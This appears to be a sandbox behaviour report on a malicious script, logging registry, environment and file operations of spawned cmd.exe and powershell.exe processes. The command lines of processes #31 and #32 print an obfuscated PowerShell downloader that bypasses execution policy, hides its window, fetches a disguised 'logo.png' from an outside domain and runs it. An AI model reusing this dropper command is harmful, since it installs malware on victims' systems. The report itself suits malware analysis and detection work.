Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = PowerShell	1	Fn
Registry	Open Key	reg_name = Windows PowerShell	1	Fn
Registry	Open Key	reg_name = Windows PowerShell\PowerShell	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Environment	Get Environment String	name = HOMEPATH, result_out = \Users\aETAdzjz	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	3	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Environment	Get Environment String	name = HomePath, result_out = \Users\aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn

Thread 0xb08

34

0

»

Category	Operation	Information	Success	Count	Logfile

Process #31: cmd.exe

57

0

»

Information	Value
ID	#31
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:38, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:02:47

OS Process Information

»

Information	Value
PID	0x9fc
Parent PID	0xa34 (c:\windows\system32\wscript.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 9EC

Threads

Thread 0x9ec

57

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:46:42 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 170103	1	Fn
System	Get Time	type = Performance Ctr, time = 22445504881	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4ac50000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77056d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Documents	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x770523d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77048290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x770517e0	1	Fn
Environment	Get Environment String	name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp	2	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	2	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 106	1	Fn Data
File	Get Info	filename = PowErshelL.eXe, type = file_attributes	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn

Process #32: powershell.exe

293

0

»

Information	Value
ID	#32
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:40, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:02:45

OS Process Information

»

Information	Value
PID	0x4d8
Parent PID	0x9fc (c:\windows\system32\cmd.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 67C 0x 644 0x 248 0x 89C 0x 210 0x 7B8 0x 9AC

Threads

Thread 0x67c

259

0

»

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
User	Lookup Privilege	privilege = SeDebugPrivilege, luid = 20	1	Fn
Module	Get Filename	file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	6	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
System	Get Info	type = Operating System	1	Fn
Environment	Set Environment String	name = PSExecutionPolicyPreference, value = Bypass	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096	3	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096	5	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	2	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
